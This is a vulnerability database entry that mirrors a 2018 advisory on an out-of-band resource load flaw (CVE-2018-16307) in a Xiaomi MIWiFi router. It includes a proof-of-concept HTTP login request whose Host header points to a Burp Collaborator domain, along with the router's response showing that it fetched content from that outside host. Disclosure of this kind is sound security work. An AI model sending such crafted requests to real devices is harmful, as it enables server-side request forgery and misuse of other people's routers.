Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtMishra Dhiraj1337DAY-ID-31021
HistorySep 03, 2018 - 12:00 a.m.

Xiaomi MIWiFi Xiaomi_55DD 2.8.50 Out-Of-Band Resource Load Vulnerability

2018-09-0300:00:00
Mishra Dhiraj
0day.today
52

0.006 Low

EPSS

Percentile

77.7%

JSON

An out-of-band resource load issue was discovered on Xiaomi MIWiFi Xiaomi_55DD version 2.8.50 devices. It is possible to induce the application to retrieve the contents of an arbitrary external URL and return those contents in its own response. If a domain name (containing a random string) is used in the HTTP Host header, the application performs an HTTP request to the specified domain. The response from that request is then included in the application’s own response.

CVE: CVE-2018-16307
Issue: Out-of-band resource load
Product affected: MIWiFi Xiaomi_55DD Version 2.8.50

Summary:
An "Out-of-band resource load" issue was discovered on Xiaomi MIWiFi Xiaomi_55DD Version 2.8.50 devices. It is possible to induce the application to retrieve the contents of an arbitrary external URL and return those contents in its own response. If a domain name (containing a random string) is used in the HTTP Host header, the application performs an HTTP request to the specified domain. The response from that request is then included in the application's own response.

## Request

POST /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.31.1/cgi-bin/luci/web/home
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 126
Cookie: __guid=86847064.3826147368769525000.1535781606575.13; monitor_count=9; psp=admin|||2|||0
Connection: close

username=admin&password=b2e8d6e552db587f3c283ce59c4d08fcbaf2cc9e&logtype=2&nonce=0_4c%3Abb%3A58%3A47%3A39%3A84_1535785091_2732

## Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 62
Connection: close
Server: Burp Collaborator https://burpcollaborator.net/
X-Collaborator-Version: 4
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
MiCGI-Switch: 1 0
MiCGI-TproxyInfo: 192.168.31.1:80
MiCGI-Upstream: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net
MiCGI-Client-Ip: 192.168.31.237
MiCGI-Host: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net
MiCGI-Http-Host: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net
MiCGI-Server-Ip: 192.168.31.1
MiCGI-Server-Port: 80
MiCGI-Status: AUTOPROXY
MiCGI-Preload: no

<html><body>x4e809xt6zpgky5b16f6dezjlglgkugifigz</body></html>

#  0day.today [2018-09-03]  #

Related

prion 1
packetstorm 1
cvelist 1
nvd 1
cve 1
prion
prion
Design/Logic Flaw
2018-09-05 21:29:00
packetstorm
packetstorm
MIWiFi Xiaomi_55DD 2.8.50 Out-Of-Band Resource Load
2018-09-02 00:00:00
cvelist
cvelist
CVE-2018-16307
2018-09-05 21:00:00
nvd
nvd
CVE-2018-16307
2018-09-05 21:29:03
cve
cve
CVE-2018-16307
2018-09-05 21:29:03

0.006 Low

EPSS

Percentile

77.7%

JSON
Related for 1337DAY-ID-31021
prion1packetstorm1cvelist1nvd1cve1